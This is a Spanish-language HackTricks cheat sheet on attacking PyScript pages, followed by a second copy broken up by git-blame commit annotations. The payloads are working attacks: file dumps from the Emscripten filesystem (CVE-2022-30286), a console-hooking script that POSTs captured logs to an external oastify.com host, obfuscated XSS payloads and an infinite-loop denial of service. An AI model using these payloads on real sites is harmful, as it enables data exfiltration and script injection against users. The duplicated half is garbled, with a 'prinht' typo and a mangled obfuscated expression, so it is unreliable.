hacktricks/generic-methodologies-and-resources/python/pyscript.md

# Pyscript

{% hint style="success" %}
Aprende y practica Hacking en AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprende y practica Hacking en GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Apoya a HackTricks</summary>

* ¡Consulta los [**planes de suscripción**](https://github.com/sponsors/carlospolop)!
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Comparte trucos de hacking enviando PRs a los repositorios de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
{% endhint %}

## Guía de Pentesting de PyScript

PyScript es un nuevo marco desarrollado para integrar Python en HTML, por lo que se puede utilizar junto con HTML. En esta hoja de trucos, encontrarás cómo utilizar PyScript para tus propósitos de pruebas de penetración.

### Volcado / Recuperación de archivos desde el sistema de archivos de memoria virtual de Emscripten:

`ID de CVE: CVE-2022-30286`\
\
Código:
```html
<py-script>
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
out = fin.read()
print(out)
</py-script>
```
Resultado:

![](https://user-images.githubusercontent.com/66295316/166847974-978c4e23-05fa-402f-884a-38d91329bac3.png)

### [Exfiltración de datos OOB del sistema de archivos de memoria virtual Emscripten (monitoreo de consola)](https://github.com/s/jcd3T19P0M8QRnU1KRDk/\~/changes/Wn2j4r8jnHsV8mBiqPk5/blogs/the-art-of-vulnerability-chaining-pyscript)

`ID de CVE: CVE-2022-30286`\
\
Código:
```html
<py-script>
x = "CyberGuy"
if x == "CyberGuy":
with open('/lib/python3.10/asyncio/tasks.py') as output:
contents = output.read()
print(contents)
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){     console.logs.push(Array.from(arguments));     console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
</py-script>
```
Resultado:

![](https://user-images.githubusercontent.com/66295316/166848198-49f71ccb-73cf-476b-b8f3-139e6371c432.png)

### Cross Site Scripting (Ordinario)

Código:
```python
<py-script>
print("<img src=x onerror='alert(document.domain)'>")
</py-script>
```
Resultado:

![](https://user-images.githubusercontent.com/66295316/166848393-e835cf6b-992e-4429-ad66-bc54b98de5cf.png)

### Cross Site Scripting (Python Ofuscado)

Código:
```python
<py-script>
sur = "\u0027al";fur = "e";rt = "rt"
p = "\x22x$$\x22\x29\u0027\x3E"
s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"
e = "c\u003d";q = "x"
y = "o";m = "ner";z = "ror\u003d"

print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
</py-script>
```
Resultado:

![](https://user-images.githubusercontent.com/66295316/166848370-d981c94a-ee05-42a8-afb8-ccc4fc9f97a0.png)

### Cross Site Scripting (Ofuscación de JavaScript)

Código:
```html
<py-script>
prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
</py-script>
```
Resultado:

![](https://user-images.githubusercontent.com/66295316/166848442-2aece7aa-47b5-4ee7-8d1d-0bf981ba57b8.png)

### Ataque de denegación de servicio (bucle infinito)

Código:
```html
<py-script>
while True:
print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;")
</py-script>
```
Resultado:

![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png)

{% hint style="success" %}
Aprende y practica Hacking en AWS: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprende y practica Hacking en GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Apoya a HackTricks</summary>

* Revisa los [**planes de suscripción**](https://github.com/sponsors/carlospolop)!
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Comparte trucos de hacking enviando PRs a los repositorios de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
{% endhint %}
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`# Pyscript`

Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:10:51 +00:00			`{% hint style="success" %}`
			`Aprende y practica Hacking en AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprende y practica Hacking en GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:10:51 +00:00			`<details>`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:10:51 +00:00			`<summary>Apoya a HackTricks</summary>`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:10:51 +00:00			`* ¡Consulta los [planes de suscripción](https://github.com/sponsors/carlospolop)!`
			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o síguenos en Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Comparte trucos de hacking enviando PRs a los repositorios de [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00
			`</details>`
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:10:51 +00:00			`{% endhint %}`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00
f 2023-06-05 19:02:11 +00:00			`## Guía de Pentesting de PyScript`

Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`PyScript es un nuevo marco desarrollado para integrar Python en HTML, por lo que se puede utilizar junto con HTML. En esta hoja de trucos, encontrarás cómo utilizar PyScript para tus propósitos de pruebas de penetración.`
f 2023-06-05 19:02:11 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`### Volcado / Recuperación de archivos desde el sistema de archivos de memoria virtual de Emscripten:`
f 2023-06-05 19:02:11 +00:00
			`ID de CVE: CVE-2022-30286`\
			`\`
			`Código:`
			```html
			`<py-script>`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:`
			`out = fin.read()`
			`print(out)`
f 2023-06-05 19:02:11 +00:00			`</py-script>`
			```
			`Resultado:`

			`![](https://user-images.githubusercontent.com/66295316/166847974-978c4e23-05fa-402f-884a-38d91329bac3.png)`

			`### [Exfiltración de datos OOB del sistema de archivos de memoria virtual Emscripten (monitoreo de consola)](https://github.com/s/jcd3T19P0M8QRnU1KRDk/\~/changes/Wn2j4r8jnHsV8mBiqPk5/blogs/the-art-of-vulnerability-chaining-pyscript)`

			`ID de CVE: CVE-2022-30286`\
			`\`
			`Código:`
			```html
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`<py-script>`
f 2023-06-05 19:02:11 +00:00			`x = "CyberGuy"`
			`if x == "CyberGuy":`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`with open('/lib/python3.10/asyncio/tasks.py') as output:`
			`contents = output.read()`
			`print(contents)`
f 2023-06-05 19:02:11 +00:00			`print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`</py-script>`
f 2023-06-05 19:02:11 +00:00			```
			`Resultado:`

			`![](https://user-images.githubusercontent.com/66295316/166848198-49f71ccb-73cf-476b-b8f3-139e6371c432.png)`

			`### Cross Site Scripting (Ordinario)`

			`Código:`
			```python
			`<py-script>`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`print("<img src=x onerror='alert(document.domain)'>")`
f 2023-06-05 19:02:11 +00:00			`</py-script>`
			```
			`Resultado:`

			`![](https://user-images.githubusercontent.com/66295316/166848393-e835cf6b-992e-4429-ad66-bc54b98de5cf.png)`

			`### Cross Site Scripting (Python Ofuscado)`

			`Código:`
			```python
			`<py-script>`
			`sur = "\u0027al";fur = "e";rt = "rt"`
			`p = "\x22x$$\x22\x29\u0027\x3E"`
			`s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"`
			`e = "c\u003d";q = "x"`
			`y = "o";m = "ner";z = "ror\u003d"`

			`print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)`
			`</py-script>`
			```
			`Resultado:`

			`![](https://user-images.githubusercontent.com/66295316/166848370-d981c94a-ee05-42a8-afb8-ccc4fc9f97a0.png)`

			`### Cross Site Scripting (Ofuscación de JavaScript)`

			`Código:`
			```html
			`<py-script>`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
			`</py-script>`
f 2023-06-05 19:02:11 +00:00			```
			`Resultado:`

			`![](https://user-images.githubusercontent.com/66295316/166848442-2aece7aa-47b5-4ee7-8d1d-0bf981ba57b8.png)`

Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`### Ataque de denegación de servicio (bucle infinito)`
f 2023-06-05 19:02:11 +00:00
			`Código:`
			```html
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`<py-script>`
			`while True:`
			`print("                              ")`
			`</py-script>`
f 2023-06-05 19:02:11 +00:00			```
			`Resultado:`

			`![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png)`

Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:10:51 +00:00			`{% hint style="success" %}`
			`Aprende y practica Hacking en AWS: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprende y practica Hacking en GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
f 2023-06-05 19:02:11 +00:00
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:10:51 +00:00			`<details>`
f 2023-06-05 19:02:11 +00:00
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:10:51 +00:00			`<summary>Apoya a HackTricks</summary>`
f 2023-06-05 19:02:11 +00:00
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:10:51 +00:00			`* Revisa los [planes de suscripción](https://github.com/sponsors/carlospolop)!`
			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o síguenos en Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Comparte trucos de hacking enviando PRs a los repositorios de [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
f 2023-06-05 19:02:11 +00:00
			`</details>`
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:10:51 +00:00			`{% endhint %}`